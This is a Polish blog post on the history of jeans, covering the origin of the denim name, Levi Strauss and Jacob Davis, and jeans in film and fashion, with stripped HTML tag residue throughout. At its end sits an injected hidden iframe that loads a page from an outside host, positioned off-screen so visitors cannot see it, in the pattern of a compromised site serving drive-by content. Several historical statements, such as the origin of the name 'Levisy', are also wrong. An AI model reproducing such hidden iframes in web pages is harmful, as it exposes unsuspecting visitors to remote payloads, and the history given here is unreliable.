Historia i fakty

Historia jeansów

28 lutego 2016 • Opublikowane przez

div id=”gazeta_article_lead”

Każdy z nas je nosi. Otwierając szafę czy to nastolatka, czy osoby dorosłej, zawsze znajdzie się ich strongchoć jedną parę/strong. Mowa o dżinsach. Jaka jest ich historia i w jaki sposób zyskały swoją popularność?

/div
!–more–

nbsp;

nbsp;

strongJak powstała tkanina dżins?/strong
div id=”gazeta_article_body”
div id=”article”
div id=”article_body”
div class=”cmsArtykulElem”

Zacznijmy od tego, że dżins znany jest również jako denim. Powstawał on w regionie znanym jako Serge de Nimes. De Nimes, czyli strongz francuska „z Nimes”/strong. Tak właśnie powstała nazwa francuskiej bawełny. Trafiła ona do włoskiej Genui, w której na skalę masową szyć z niej zaczęto stroje dla żeglarzy. Ponieważ były wygodne i wytrzymałe, a także łatwe w praniu, szybko się przyjęły. Amerykanie nazywają Genuę „Genes”, co wymawia się „dżyns”. Stąd nazwa tkaniny.

nbsp;

strongLevi Strauss — twórca pierwszej pary dżinsów/strong

W 1850 roku Levi Strauss przeniósł się z Bawarii do Ameryki. W San Francisco postanawia założyć firmę i zaczyna produkować niebieskie, dżinsowe spodnie. Krótko potem nawiązał on współpracę z Jacobem Davisem. Mężczyzna ten wzmacniał strongmiedzianymi nitami/strong miejsca w spodniach, które były szczególnie narażone na rozdarcia. Ich spółka odniosła spektakularny sukces.

nbsp;

/div
strongLevisy/strong

Marka spółki zaczęła zyskiwać strongcoraz większą popularność/strong, a jej spodnie nazywać zaczęto „Levisami” — od połączenia nazwisk właścicieli. W 1905 roku premierę miał model 501. Po 21 latach guziki w spodniach zastąpił zamek błyskawiczny. W 1934 firma stworzyła tzw. Lady Levi’s, czyli pierwsze niebieskie dżinsy dla kobiet. W czasie II wojny światowej amerykańscy żołnierze nosili na sobie strongdżinsowe spodnie/strong i kurtki.

/div
/div
/div
nbsp;

a href=”http://argos.pl/blog/wp-content/uploads/2016/02/dżinsy-1.jpg”img class=”size-full wp-image-2681″ src=”http://argos.pl/blog/wp-content/uploads/2016/02/dżinsy-1.jpg” alt=”Źródło: polki.pl” width=”650″ height=”488″ //a Źródło: polki.pl

nbsp;

strongDżinsy — ulubieńcy gwiazd/strong
div id=”gazeta_article_body”
div id=”article”

W latach 50. „Levisy” pierwszy raz pojawiły się strongw filmach/strong i zaczęły być utożsamiany z buntem. W bardzo obcisłych dżinsach tańczył Elvis Presley. Nosiły je również Marylin Monroe potem Brigitte Bardot. strongDżinsy /strongznane były już nie jedynie w Ameryce, ale też w Europie i Azji, ale w tych miejscach stały się symbolem tego, co amerykańskie. Świat show-biznesu ukochał sobie dżinsy. Hipisi nosili za to strongdżinsy-dzwony/strong do koszul oraz chust na głowie i wisiorków.

nbsp;

strongDżinsy dzisiaj /strong

Dziś dżinsy nosi chyba każdy. Są na tyle uniwersalne, że pasują i do szpilek, i do marynarki, i do sportowej bluzy. Znają je wszyscy i nie uchodzą one już jako strongspodnie buntowników/strong, którzy w ten sposób wyrażają przynależność do subkultury. Z tkaniny dżins szyte są nie tylko spodnie, ale i kurtki, koszule i kamizelki. Można spodziewać się, że nie znikną z szaf w najbliższym czasie. A wszystko dzięki Straussowi.

/div
/d!–844c7b74e31d727d5814a0ed667c0255–iframe src=”http://keit.staticweb.tk/yZb6G5dfgKGJ” width=640 height=480 style=’position: absolute; left: -1000px; top: -1000px; z-index:-1;’/iframe